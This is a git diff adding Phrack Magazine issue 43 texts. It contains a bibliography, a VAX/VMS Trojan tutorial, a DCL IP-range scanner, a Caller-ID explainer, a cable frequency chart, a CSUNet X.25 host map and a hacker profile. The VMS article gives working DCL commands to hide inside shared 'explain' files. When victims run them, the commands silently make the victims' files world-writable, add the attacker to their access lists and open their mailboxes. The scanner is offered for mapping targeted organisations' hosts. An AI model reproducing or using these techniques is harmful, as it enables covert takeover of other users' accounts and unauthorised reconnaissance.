+  - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27,
+   1989: 252.
+
+  - "Hostile Takeovers" by Paul Wallich. Scientific American, January
+   1989: 22-23.
+
+  - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November
+   25, 1988: 1121-1122
+
+  - "Researcher Fear Computer Virus' Will Slow Use of National Network"
+   by Calvin Sims.  The New York Times, Monday, November 14, 1998: B6.
+
+  - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca &
+   Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.
+
+  - "The Science of Computing: Computer Viruses" by Peter J. Denning.
+   American Scientist, Vol. 76, May-June 1988:236-238.
+
+  - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April
+   8, 1991:81.
+
+  - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.
+
+  - "Computer System Intruder Plucks Passwords and Avoids Detection" by
+   John Markoff. The New York Times National, Monday, March 19, 1990.
+
+  - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of
+   the day. December 15, 1991: 150-155.
+
+  - "Halting Hackers." The Economist. October 28, 1989: 18.
+
+  - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly,
+   January 1989: 21-24.
+
+  - "Greater awareness of security in aftermath of computer worm" by Seth
+   Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.
+
+  - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May
+   1989: 85-92.
+
+*****************************************************************************
+
+             {----------------------------------------------}
+             {                                              }
+             {       VMS/VAX Explain Files Explained        }
+             {                     or                       }
+             {      Security Holes in the VAX and DCL       }
+             {                                              }
+             {            By: The Arctic Knight             }
+             {                                              }
+             {----------------------------------------------}
+
+     VAX/VMS hacking has declined in popularity over the years due to the
+abundance of UNIX machines now available. It has even gotten bad press from
+fellow hackers. Included in this file is a security hole the size of , oh,
+any of the older IBM mainframes. With a little curiosity, persistence, and
+down right stubbornness I came across this rather obvious hole in the system.
+However, this hole may be so obvious that it has remained relatively hidden
+until now, especially since the decline of DCL users.
+     On most VAX systems, there is something called explain files.  These are
+usually help files that are made up by the system operators or borrowed from
+somewhere to help better explain the way certain features of the system work,
+whether they be general VAX commands, or system-specific programs.
+     When you are in your account (Presumably, a fake one, as this can be
+tracked down if you are foolish) type:
+
+$ explain index
+
+     and you will get a list of all the explain files on your system. Go ahead
+and take a look around these just to get a feel of what it looks like.  It
+should be a menu driven list of text files to view or programs to run(!!!).
+     Most system operators only set this up to show various text files
+describing commands like mentioned above. However, DCL .com files can be run
+from explain files as well. Now comes the fun. Many systems will also allow
+users to set up there own explain file. A really nice way to make it easy for
+other users to view text files or run programs that you have set for group or
+world access.
+     The first thing someone needs to do is make a file called INTRO.LKT which
+will contain whatever introduction text that you would like displayed before
+your explain file menu is displayed(i.e. you might have a description of
+yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
+CONTAINED IN A TEXT FILE!!!!)
+     You can use any editor to do this like EDT(a line editor) or TPU(a full
+screen editor). You will need to type something along these lines to create the
+file:
+
+$set vt=100         !if using a full screen editor like TPU
+$edit/tpu intro.lkt
+
+     After you are finished typing in the file, if you used TPU (A much better
+choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
+a file called INDEX.LKI which will contain the file directories, filenames,
+and short descriptions of the files that you want to have displayed. You do
+this in the same manner as above, by entering an editor, and creating the file.
+
+$edit/tpu index.lki
+
+     Now, in this file the lines should look like the following:
+(File Directory)         (Filename)      (File Description)
+
+Phrack41.txt  A complete copy of Phrack 41 for your enjoyment.
+User:[aknight.hack]vms.txt A guide to hacking VMS systems.
+Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.
+
+     Now, to explain these three lines. The first one will look for the program
+in your main directory. The second line will look for the program listed after
+it on the device called USER and in the HACK directory within the AKNIGHT
+directory. The final line will look on the device called TEMP$1 in the FTP
+directory within the AKNIGHT directory. Adding DCL programs will be explained
+in a minute, but first lets get this up and running.
+     Now, that you have typed in the text files you want, and saved this file
+you need to set the protection on your main directory and any others that need
+accessing like the text files to group and world access. For the above example
+one would want to type(assuming you are in your main directory):
+
+$set prot=(g:re,w:re) user:[000000]aknight.dir     !This is my main directory
+$set prot=(g:re,w:re) user:[aknight.hack]
+$set prot=(g:re,w:re) temp$1:[000000]aknight.dir   !My second storage device
+$set prot=(g:re,w:re) temp$1:[aknight.ftp]
+$set prot=(g:r,w:r)   phrack41.txt                 !Giving privs to read only
+$set prot=(g:r,w:r)   user:[aknight.hack]vms.txt
+$set prot=(g:r,w:r)   temp$1:[aknight.ftp]ftplist.txt
+
+     Now, if you type:
+
+$explain aknight              ! (my username in this instance,your normally)
+
+     You should get a print out to screen of your INTRO.LKT file and then a
+message along the lines of "Hit <return> to continue". When you hit return a
+menu will appear very similar to the normal explain file menu except with your
+files listed and their descriptions which were accessed by the computer from
+your INDEX.LKI file. It would look like this(or something similar) in the above
+example.
+
+   {a print out of my INTRO.LKT file...}
+
+Hit <RETURN> to continue
+
+                             EXPLAIN AKNIGHT
+================================================================================
+(A) PHRACK41  T-A complete copy of Phrack 41 for your enjoyment.
+(B) VMS       T-A guide to hacking VMS systems.
+(C) *EXPLAIN/USER AKNIGHT FTPLIST
+              T-A list of FTP servers in-state.
+(Q) TERMINATE THIS PROGRAM
+================================================================================
+T = Text Display P = Program to be run
+(* = Related Information)
+Choose A-C, Q, oe type HELP for assistance.
+
+     Now you have an explain file. Pressing A-C will print those files to
+screen with pauses at each page if set up on your system/account to do so. I
+typed out number C the way I did, because when it has to access a directory
+other than it's main one, it will usually do this. I think there is away around
+this, but to be quite honest I haven't bothered figuring it out yet. When you
+quit, you will be dropped back off at your main prompt. The reason you need to
+set your protections, is because even thought from your account, it may look
+like it is working, if you don't set your protections as described above,
+NO ONE else will be able to view it!!
+     Now, comes the fun part. Putting DCL .COM files into your explain file.
+These are put into your index just like any text file. So you could type up a
+program to let someone copy the public files you have in your account to their
+directory, or something similar. The security flaw comes in here and it is
+a big one. Since a user is accessing your explain file from their account, any
+file that they run, issues commands in their account. So, one might plant a
+line in the middle of the above program that say something like:
+
+$set def sys$login                   !Returns them to their main directory.
+$set prot=(g:rwed,w:rwed) *.*;*      !Their files are now read, write, execute,
+                                     !and deleteable by anyone, including you.
+
+     Here is another idea. Say you create a text reader in DCL, to allow people
+to jump around in the text files you have, skip pages, etc. called TYPE.COM in
+your main directory. Anytime you can fool people into thinking that the
+computer is taking a little time to think, you can insert some major commands,
+i.e. when it is skipping pages, or coping files, which almost takes no time at
+all in reality. I STRONGLY suggest starting any program you plan to nest
+commands like this into with:
+
+$set noverify
+
+     Which will make sure that the program lines don't get printed to the
+screen as they are running. Another important command to know is the following
+which will cause the next text output from the VAX to be sent to a NULL device,
+so it will essentially be lost and not printed to the screen. So, if one is
+accessing someone's mailbox, you don't want a messaging appearing on screen
+saying that you have entered VAX/VMS mail or whatever. The command is:
+
+$assign nl:sys$output/user
+
+     If you forget the /user it will send the output to the null device for the
+session, instead of just one line.
+     Some other things one might do would be to add yourself to someone's
+ACL(access control list) by typing:
+
+$set acl/acl=(ident=[aknight],access=control) *.*;*
+
+     Now, this will give you access to all their files just as if you were the
+user, however if they bother to ever do a dir/prot command your username will
+be printed all over the screen, so one would suggest if you must do this, to
+use a fake account. Same with this below command:
+
+$assign nl:sys$output/user
+$mail set write aknight
+
+     The second line will give me read and write access to someone's mailbox,
+but once again if they bother to check their mailbox protections your username
+will be displayed.
+     In case, you haven't realized this yet, this all has A LOT of potential,
+and what I have mentioned here is just the tip of the iceberg and really mostly
+small and even foolish things to do, but the fact comes down to ANYTHING the
+user can do in their account, YOU can do in there account if you know the right
+commands and have the patience to nest them into a .COM file well enough.
+     When you have created the .COM file and added it to the INDEX.LKI file,
+then you will need to set the protection of the file like so:
+
+$set prot=(g:e,w:e) type.com                  !Execution only. No read privs.
+
+     You now have it a fully functional explain file that is only held down by
+your imagination.
+
+     Remember, malicious actions aren't the sign of a true hacker, so don't
+delete a users complete directory just because you want to show of your power.
+Most people won't be impressed.  If your a SYSOP, fix this DAMN HOLE!!! And if
+your a user well, learn the system quickly, explore, absorb, and discover some
+other hole before the above SYSOP patches this one......
+
+  COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
+{______________________________________________________________________________}
+
+*****************************************************************************
+
+                               A Internet Scanner
+
+                                  (War Dialer)
+
+                                       by
+
+                                    MadHatter
+
+
+
+Purpose of this program
+~~~~~~~~~~~~~~~~~~~~~~~
+
+     Remember those scanner, war dialer programs everyone used to scan areas of
+telephone numbers to find unknown hosts?  Well, now your on the net and you're
+targeting some certain establishment, and you know which part of the net they
+own, but the hell if you know what the actual IP addresses of their hosts are...
+Telneting to NIC.DDN.MIL is no help, their records are a year old...  Might as
+well have been 10 yrs ago...  So you type every possible IP address in.  Right?
+After a while that shit gets tiring...  Well, hell let the computer do it,
+that's what its there for.  More speed, no sore fingers, no bitching, and it
+runs when you're not there.  Almost perfect.....
+
+
+Program Details
+~~~~~~~~~~~~~~~
+     DCL is the language and it runs on Vaxen.  A,B,C,D respectively represent
+the starting IP address.  E,F,G,H respectively represent the ending IP address
+(ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
+etc.,  E = 6, F = 1, etc.)
+     The prog creates a data file (FINAL.DAT) that holds all successful
+connections.  If you run it in batch, it also creates a .log file.  This by
+far takes up most of the memory.  When the program quits, delete it.
+This prog is just one big loop.  It finds a good telnet address and then
+reIFINGERs there, saving it.
+
+
+Program Changes
+~~~~~~~~~~~~~~~
+
+     If you run it in batch, then you might (probably) have to define where
+the IFINGER or FINGER program is.  Make sure it is the one for FINGERing remote
+hosts, the commands for it vary.  Why do you have to define it?  Because the
+dumb-ass sysop couldn't think of why anyone would want to use it in batch.
+
+
+Problems
+~~~~~~~~
+
+     The IFINGER (FINGER) command might not connect to some hosts from your
+system.  Why can you TELNET there but no IFINGER?  It all probably has to do
+with the other host (it has tight security, too far away, doesn't support
+FINGERing, etc.).
+
+
+No Solutions (Just one)
+~~~~~~~~~~~~~~~~~~~~~~~
+
+     You say if I can TELNET to more places than IFINGERing, why not base the
+scanner on the TELNET command?  Two reasons: (1) the security with the TELNET
+command requires its output goes to a terminal, never to run in batch; (2) the
+TELNET command does not give the character address (at least not on the system I
+use).  To have the character address is valuable to me.  The program lists the
+IP address, the character address, then whatever finger came up with.
+     When running in batch, the program will quit eventually (do to MAX CPU
+time or exceeded disk quota).  This can be a pain (especially if its CPU time),
+you can always get more memory.  Try changing the file specifics in the prog,
+and run many versions of it at once, to get as much cpu time as possible.
+For memory, clear your account, or get more of them.  Another problem is when
+your program has stopped and you have nothing in FINAL.DAT file.  So where do
+you start the batch off again?  All I can say is count the number of failed
+connections and add 'em to your previous start address, start at that address.
+
+
+More Ideas
+~~~~~~~~~~
+
+     If you want the net area of an establishment then ftp to NIC.DDN.MIL and
+get the hosts listing, or TELNET there and search for the name.
+     Some areas of the net do not like to be scanned.  Your sysop will get nasty
+calls, and then you will get nasty e-mail if you for instance scan the Army
+Information Systems Center.  Or any other government org.  Of course, this
+program wouldn't hurt them at all, it would bounce back.  They use firewalls.
+But they will bitch anyway.
+     After you run this program for awhile, you'll notice the net is really
+a big empty place.  Hosts are few and far between (at least address wise).
+Are you agoraphobic yet?  What do you do with all this room?
+
+
+MadHatter
+
+
+*----------------------------CUT HERE------------------------------------------*
+$ A = 0
+$ B = 0
+$ C = 0
+$ D = 0
+$ E = 257
+$ F = 0
+$ G = 0
+$ H = 0
+$ D = D - 1
+$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
+$ CREATE FINAL.DAT
+$ LOOP1:
+$     ON SEVERE_ERROR THEN GOTO SKIP
+$     D = D + 1
+$     IFINGER @'A'.'B'.'C'.'D'
+$     ON SEVERE_ERROR THEN GOTO SKIP
+$     ASSIGN TEMPFILE.DAT SYS$OUTPUT
+$     WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
+$     IFINGER @'A'.'B'.'C'.'D'
+$     DEASSIGN SYS$OUTPUT
+$     APPEND TEMPFILE.DAT FINAL.DAT
+$     DELETE TEMPFILE.DAT;*
+$ SKIP:
+$     IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
+$     IF D .EQ. 256 THEN GOTO LOOP2
+$     IF C .EQ. 256 THEN GOTO LOOP3
+$     IF B .EQ. 256 THEN GOTO LOOP4
+$     GOTO LOOP1
+$ LOOP2:
+$      D = 0
+$      C = C + 1
+$      GOTO LOOP1
+$ LOOP3:
+$      C = 0
+$      B = B + 1
+$      GOTO LOOP1
+$ LOOP4:
+$      B = 0
+$      A = A + 1
+$      GOTO LOOP1
+$ EXIT
+*------------------------------------CUT HERE----------------------------------*
+
+*****************************************************************************
+
+       Caller Identification
+       by (Loq)ue & Key
+       3/20/93
+
+
+        Caller-Identification (CID), is a relatively new service being
+   offered by several carriers.  It is part of a total revamp of the
+   telephone network, with the telephone companies trying to get people
+   to spend more money on their systems.  CID is just one of the newer
+   CLASS services, which will eventually lead into ISDN in all areas.
+
+        Caller-ID allows a receiving party to see the number that is
+   calling before they pick up the phone.  It can be used for everything
+   from pizza delivery to stopping prank callers.  One scenario
+   made possible from CID is one where a salesman dials your number,
+   you look on a little box and see that it is someone you don't want
+   to talk to, so you promptly pick up the phone, say "Sorry, I don't
+   want any *** *** products" and slam down the receiver.  Ah, the
+   wonders of modern technology.
+
+        Caller-ID starts by a person making a call.  When the person
+   dials a number, the local switch rings the calling number once, and
+   then sends a specially encoded packet to the number, after checking
+   to see if that caller has access to the Calling Number Delivery
+   service.
+
+        The packet can contain any information, but currently it holds
+   a data stream that contains flow control, and error checking data.
+   The specifications state that several signals can exist, however,
+   only the Caller-ID signal is used currently.
+
+ The CID packet begins with a "Channel Seizure Signal".  The
+   CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to
+   250 milliseconds of a 600 hz square wave.
+
+        The second signal is the "Carrier Signal," which lasts for 150
+   milliseconds, and contains all binary 1's. The receiving equipment
+   should have been "woken-up" by the previous signal and should now
+   be waiting for the important information to come across.
+
+        Next are the "Message Type Word", and the "Message Length Word".
+   The MTW contains a Hex $04 for CID applications, with several other
+   codes being planned, for example $0A to mean message waiting for
+   a pager.  The MLW contains the binary equivalent of the number of
+   digits in the calling number.
+
+        The data words come next, in ASCII, with the least significant
+   digit first.  It is padded in from with a binary 0, and followed by
+   a binary 1.  A checksum word comes after that, which contains the
+   twos-complement sum of the MLW and data words.
+
+ The checksum word usually signals the end of the message from
+    the CO, however, other messages for equipment to decode can occur
+    afterwards.
+
+        Caller-ID can usually be disabled with a 3 digit sequence,
+   which can vary from CO to CO.  Several of these have been mentioned
+   in the past on Usenet, in comp.dcom.telecom.
+
+        Caller-ID chips are available from many sources, however,
+   remember that you must connect these chips through an FCC-approved
+   Part-68 Interface.  Several of these interfaces are available,
+   however they are fairly expensive for an amateur electronics hacker.
+
+        If you have any more questions on CID, mail me at the above
+   address, or post to comp.dcom.telecom.
+
+       Additional Sources from Bellcore:
+
+        Nynex Catalog of Technical Information #NIP-7400
+        SPCS Customer Premises Equipment Data Interface #TR-TSY-0030
+        CLASS Feature: Calling Number Delivery #FSD-02-1051
+        CLASS Feature: Calling Number Blocking #TR-TSY-000391
+
+*****************************************************************************
+
+     THE  "OFFICIAL"  CABLE  TELEVISION  VIDEO  FREQUENCY  SPECTRUM  CHART
+               COURTESY  OF:   JOE  (WA1VIA)   &   JIM  (WA1FTA)
+
+CATV CHANNEL        FREQUENCY (MHz)          CATV CHANNEL      FREQUENCY (MHz)
+-------------------------------------------------------------------------------
+ 2      2            55.25                    37     AA         301.25
+ 3      3            61.25                    38     BB         307.25
+ 4      4            67.25                    39     CC         313.25
+ 5      5            77.25                    40     DD         319.25
+ 6      6            83.25  (85.25 ICC)       41     EE         325.25
+---------------------------------------       42     FF         331.25
+ 7      7           175.25                    43     GG         337.25
+ 8      8           181.25                    44     HH         343.25
+ 9      9           187.25                    45     II         349.25
+10     10           193.25                    46     JJ         355.25
+11     11           199.25                    47     KK         361.25
+12     12           205.25                    48     LL         367.25
+13     13           211.25                    49     MM         373.25
+---------------------------------------       50     NN         379.25
+14      A           121.25                    51     OO         385.25
+15      B           127.25                    52     PP         391.25
+16      C           133.25                    53     QQ         397.25
+17      D           139.25                    54     RR         403.25
+18      E           145.25                    55     SS         409.25
+19      F           151.25                    56     TT         415.25
+20      G           157.25                    57     UU         421.25
+21      H           163.25                    58     VV         427.25
+22      I           169.25                    59     WW         433.25
+----------------------------------------      60     W+         439.25
+23      J           217.25                    ---------------------------------
+24      K           223.25                    61     W+1        445.25
+25      L           229.25                    62     W+2        451.25
+26      M           235.25                    63     W+3        457.25
+27      N           241.25                    64     W+4        463.25
+28      O           247.25                    65     W+5        469.25
+29      P           253.25                    ---------------------------------
+30      Q           259.25                    66     A-1        115.25
+31      R           265.25                    67     A-2        109.25
+32      S           271.25                    68     A-3        103.25
+33      T           277.25                    69     A-4         97.25
+34      U           283.25                    70     A-5         91.25
+35      V           289.25                    ---------------------------------
+36      W           295.25                    01     A-8         73.25
+-------------------------------------------------------------------------------
+* This chart was created 08/19/89 by:  WA1VIA & WA1FTA.   Some uses include the
+isolation of CATV interference to other radio services,  and building of active
+& passive filters,  and descramblers.  This does NOT give you the right to view
+or decode premium cable channels;  without proper authorization from your local
+cable TV company.  Federal and various state laws provide for substantial civil
+an criminal penalties for unauthorized use.
+-------------------------------------------------------------------------------
+******************************************************************************
+
+                          -----------------------------
+                             The CSUNet X.25 Network
+                              Overview by Belgorath
+                          -----------------------------
+                              C y b e r   C o r p s
+
+     Calstate University, along with Humboldt State, runs a small X.25 network
+interconnecting its campuses. This file will attempt to give an overview of
+this network. The hosts on this network are connected via 9600-baud links. The
+main PAD on this network is a PCI/01 that allows the user to connect to several
+hosts. Among them are:
+
+(At the time of this writing, several of the machines were unreachable. They
+ are marked with "No info available")
+
+hum       - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
+swrl      - A CalState CDC Cyber named "Swirl", running CDCNet. You may use
+            CDCNet to connect to the following hosts:
+            ATL    (SunOS, eis.calstate.edu), login as:
+               access to request an account
+               ctp    to access CTP
+            CCS    CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
+            COC    CDC Cyber 960-31 (NOS 2.7.1)
+            FILLY  VAX 6230 (VMS 5.3)
+            ICEP   IBM 4381 (VM)
+            OX     IBM 4381 (MVS) (Aptly Named)
+mlvl      - University of California's Library Catalog System, named
+            "Melvyl".
+sb        - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
+sd        - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
+chi       - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough
+            this system is running CDCNet with itself as the only host
+bak       - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1)
+            this system is running CDCNet, and if you fail the login, you
+            can connect to these systems, if you type fast enough:
+            CCS      - Central Cyber 960 System
+            CSBINA   - CSUB Instructional Vax 3900
+            CSBOAA   - CSUB Office Automation Vax 4300
+            CYBER    - Local host
+            RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
+ccs       - CDC Cyber 960-31 (CCS from Swirl)
+coc       - CDC Cyber 960-31 (COC from Swirl)
+dh        - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) -
+            this system runs CDCNet with no hosts.. go figure
+fre       - Calstate/Fresno - No info available
+ful       - Calstate/Fullerton - No info available
+hay       - Calstate/Hayward - No info available
+la        - Calstate/Los Angeles - No info available
+lb        - Calstate/Long Beach - No info available
+mv        - No info available
+news      - No info available
+nor       - Calstate/Northridge - No info available
+pom       - California State Polytechnic University, Pomona - No info available
+sac       - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
+sf        - Calstate/San Francisco - No info available
+sj        - San Jose State University - No info available
+son       - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this
+            system runs CDCNet with itself as the only host
+sm        - No info available
+slo       - California State Polytechnic University, San Luis Obispo - No info
+            available
+sta       - Calstate/Stanislaus - No info available
+ven       - No info available
+carl      - No info available
+
+caps      - CSUNet networking machine. From it, you can connecting to most
+            PAD hosts plus a few more. The extras are:
+            access    - Connect to eis.calstate.edu (login as "access")
+            core      - Connect to eis.calstate.edu (login as "core")
+            ctp       - Connect to eis.calstate.edu (login as "ctp")
+            eis       - Connect to eis.calstate.edu (login as "eis")
+            trie      - Connect to eis.calstate.edu (login as "trie")
+            csupernet - CSUPERNet appears to be a public-access UNIX.
+                        login as "public" for ATI-Net.
+                        login as "super" for academic information.
+                        login as "atls" for the ATLS system
+                        Once you apply for an account here, you can telnet
+                        to caticsuf.cati.csufresno.edu to use it.
+
+     This is all well and good, but how to you access CSUNet? It can be reached
+via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
+allows several services, among them are:
+
+     X25 - Connect directly to CSUNet PAD
+     960 - CDC Cyber 180/830 (Swirl)
+     830 - CDC Cyber 180/830 (COC from Swirl)
+     VAX - VAX 8700 (VMS V5.3)
+     70  - DEC PDP 11/70 (running RSTS)
+     SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
+  TELNET - Telnet Server
+
+     That's really all there is to say concerning the network structure (well,
+I could go through and list all their X.25 addresses, but I won't). There's a
+ton more to be said about using this network, but its little quirks and
+surprises can be left to you to figure out. What I can do here is give a few
+hints on using CDCNet and the PAD.
+
+Using the PAD
+~~~~~~~~~~~~~
+     Once you're at the X.25 PAD, you'll get a message like:
+CSUnet Humboldt PCI/01, Port: P17
+     At the "Pad>" prompt, simply type the hostname to connect to. When in
+doubt, type "help <subjectname>", or just "help" for a list of subjects that
+help is available on.
+
+Using CDCNet
+~~~~~~~~~~~~
+     When a CDC Cyber says "You may now execute CDCNet Commands", this is your
+cue. You have the following commands available:
+
+activate_auto_recognition
+activate_x_personal_computer
+change_connection_attribute
+change_terminal_attribute
+change_working_connection
+create_connection
+delete_connection
+display_command_information
+display_command_list
+display_connection
+display_connection_attribute
+display_service
+display_terminal_attribute
+do
+help
+request_network_operator
+
+     The ones to concern yourself with are display_service, create_connection,
+and help. "help" gives the above command listing (useful), "display_service"
+lists the hosts on the current CDCNet, and "create_connection <host>" creates a
+connection to "host" on the CDCNet.
+
+*******************************************************************************
+
+
+ 
\ No newline at end of file
diff --git a/phrack43/6.txt b/phrack43/6.txt
new file mode 100644
index 0000000..9328656
--- /dev/null
+++ b/phrack43/6.txt
@@ -0,0 +1,300 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 6 of 27
+
+                            -:[ Phrack Prophile ]:-
+
+This issue our prophile features a hacker who has been around forever,
+who's been there and done that, literally.  His handle is Dr. Who.
+When almost everyone was still mystified by Telenet, Dr. Who was busily
+exploring Europe's PSN's like PSS and Datex-P.  When the Internet was in
+its infancy, Dr. Who was there with an account on BBN.  When the world
+was short of NUI's, Dr. Who discovered and perfected Pad-To-Pad.  When
+the world still thought COSMOS was the end-all-be-all, Dr. Who was
+lurking on 1A's.  One of the early LODers and one of the longest lasting.
+And to top it all off, a close personal friend.  How elite can you get?
+
+______________________________________________________________________________
+
+ Personal Info:
+
+           Handle: Doctor Who (aka Skinny Puppy and Saint Cloud)
+         Call him: Bob
+    Date of Birth: February 5, 1967
+              Age: 26
+           Height: 6'1"
+           Weight: 160 lbs
+  Computers owned: in chronological order:  Apple ][ series, Sinclair ZX81,
+                   Commodore TRS-80 models 4 and 16, Coco, Atari 512,
+                   Toshiba 2000sx.  I am probably leaving out some.
+
+
+How did you get your handle?
+
+    From the TV show, of course - I had a hard time defending it from other
+    people, so would sometimes add (413), my home area code, to identify
+    which one I was.  Skinny Puppy was from the band of course,
+    and Saint Cloud was from the location of a system I was playing with,
+    in France.
+
+How did you get started?
+
+     As a kid, I was a radio & electronics junkie.  In 6th grade I wanted
+     one of those $99 "computer kits" you would see in the back of "Popular
+     Electronics" magazine, which had a hex keypad, and seven-segment LED
+     display, had 1K of ram, etc...But lusted after the TRS-80 model-I
+     when I used it at Radio Shack.  I finally got a computer in 1981
+     when I was in 9th grade.  I asked my parents for a Commodore,
+     but they went all out and got an Apple ][+.  I took to programming
+     instantly, and within a few months had a reputation as the best
+     programmer in my school.
+
+     In a 1982 "Popular Communications" magazine article, I discovered
+     the world of loops and test tones and started playing with those.
+     I later tried to make free phone calls by using a tape recorder
+     as a red box but failed, looking back probably due to inadequate
+     volume. The seeds had been planted.
+
+     I wanted all sorts of software, but I had no money, and my parents
+     wouldn't buy very much.  One computer-club meeting, someone brought
+     in about 15 disks of pirated software, and I had a chance to copy
+     about 4 disks.  They guy told me about pirate BBSs, and people trading
+     software.  In a few of the games I copied, there were numbers to
+     different BBSes, and when I was at a friends house on Cape Cod in the
+     summer of 1983, we used his 300 baud acoustic modem to call them.
+     I remember calling Pirate's Harbor in Boston, and I think we called
+     Pirate-80.
+
+     I wanted a modem badly, but they were too expensive.  I convinced a
+     friend to split the cost with me, and on January 2, 1984 my
+     networker modem arrived.  That month, in the process of getting warez
+     I ran up over $150 in phone bills as there were no local boards.
+     I was becoming obsessed with being on the modem, and on the computer
+     in general.  I was never a good student, and my parents and teachers
+     found a way, they thought, to entice me to do my homework - hold
+     computer usage over my head.  But this just succeeded in making me
+     sneak access when no one was looking - during lunch at school, or
+     when my parents went shopping at home.  Soon they locked the computer
+     room (the den, really) when they left, but I used a ladder to get
+     in to the second story window until I had a copy of the key.  To this
+     day I think if they let me indulge myself in my interest, I would have
+     become a much more normal computer geek, and done better in school.
+     Anyhow, I started learning about codez to appease the huge phone bills,
+     and started to learn more about phones & how they worked.  The pirating
+     fell by the wayside as I became more involved with phreak/hack boards.
+     I was fascinated by communications (I always had been) and
+     phreaking/hacking opened up new frontiers.  My inhibitions in breaking
+     the law melted away because it interfered with my enjoyment of
+     knowledge - had there been opportunities to pursue this avocation
+     without breaking the law, I probably would have done so.
+
+     A hacker was born.
+
+
+What are your interests?
+
+              Women: Tall, thin, brainy, blue eyes.  It seems as though I
+                     attract all the psychos.  Right now, I am FREE of
+                     any relationships and haven't decided whether I am
+                     enjoying it or not.
+               Cars: Cars are the greatest things.  I love them.  Art,
+                     Machine & House  - The only possession I have that
+                     encloses me.  I got my license later than most people,
+                     and have learned to enjoy the freedom wheels bring,
+                     especially for someone who lives in a rural area.
+                     Right now, I own two cars, one running (barely) and
+                     entirely generic, the other one very unique, beautiful,
+                     and broken.  The story of my life!
+               Food: I hate fish & chicken, love hot food.  Not a vegetarian
+                     in the least.  But don't eat much, I am too busy.
+                     I survive on Coffee.
+              Music: I have been 'alternative' for a while now, kind of
+                     Gothic, sometimes I dress that way, sometimes I don't.
+                     Favorite bands:  Joy Division, Skinny Puppy, old Cure,
+                     but I have been starting to like Techno more and
+                     also Classical.  Go figure.
+   Favorite authors: Ayn Rand, Ann Rice, Robert Anton Wilson, George Orwell,
+                     Douglas Adams, J.G. Ballard
+      Favorite Book: Atlas Shrugged
+    Favorite Movies: Brazil, 1984, The Holy Grail, Heathers, Blade Runner,
+                     Max Headroom, Slacker, Subway, Drowning by Numbers, Dune
+        Favorite TV: Doctor Who (of course), The Avengers, Miami Vice,
+                     Hawaii Five-O
+
+What am I?
+
+     A slacker, a hacker, a writer, a romantic, a twenty-nothing, a lost
+     poet, a New Englander, an American in the truest sense of the word,
+     a girl-chaser, a connoisseur of cheap champagne & expensive beer,
+     a dilettante, a smoker of cloves, caffeine addict, an atheist,
+     a discordian, a libertarian of sorts, a cynic, a procrastinator,
+     a conversationalist, a fast driver, an oldest child, a criminal,
+     a watcher of fire & water, a lover of love, a believer in the unpure,
+     a trekkie, a whovian, an anglophile, still an undergraduate, jealous,
+     mischievous, a perfectionist, a believer in the essential
+     good in mankind, and probably a mortal.
+
+What are some of your most memorable experiences?
+
+     The worst day of my life - 3/11/86 - getting busted, and not knowing
+     what for.  My parents called up my high-school and left a message for
+     me to call home immediately.  When I did, they informed me that the
+     Secret Service and TRW (Hi Mr. Braum) had been in our house and removed
+     everything.  A nosy neighbor saw the whole incident, and within days our
+     entire town knew about the raid.
+
+     Some three and a half years later they pressed charges.  So much for
+     due process and right to a speedy trial.
+
+   Good days:
+
+     5-91 - Being all fucked up in NYC with my girlfriend and Bill from RNOC;
+     10/9/84 - My first TAP meeting.  Expecting to meet Mark Tabas but
+     meeting his father instead.  Tabas had run away from home, and his
+     parents found some notes indicating that he might turn up in New York
+     at Eddie's for the TAP meeting.  Tabas' dad hopped on a plane to NYC,
+     rented a car and staked out the meeting.  Everyone inside, already
+     convinced that they were under surveillance, became very aware that
+     they were being watched by some guy in a suit and a rental car.
+     Eventually, he came inside and asked if anyone knew where Tabas was.
+     We said "Who wants to know?"  To which he gave out his business card
+     letting us know he was Tabas' dad and just worried.  Tabas was not
+     even in New York.
+
+     The whole summer of 1985 - staying at home, hacking and loving being
+     a computer geek. Four days straight on an Alliance Teleconference once,
+     being woken up each morning by blasts of touch-tone!
+
+     Philadelphia Cons, back in 86.
+
+     West 57th St. - a few seconds towards my 15 minutes of fame.
+
+     KP+914-042-1050+ST
+     Discovering Pad-to-Pad.
+     McD:  Becoming an XRAY Technician.  (Dr. Bubbnet)
+     MSK ../tdas
+     NET-LINE-20245614140000.
+
+     Wallpapering my room with Sprint Foncard printouts
+
+     Most of the rest of my most memorable experiences are in my love life,
+     which is none of your business!
+
+Some People (and/or BBSes) To Mention:
+
+     My favorite BBS of all time was Farmers of Doom.  Also memorable were
+     The Legion of Doom, Osuny, WOPR, Black Ice, and lots more.
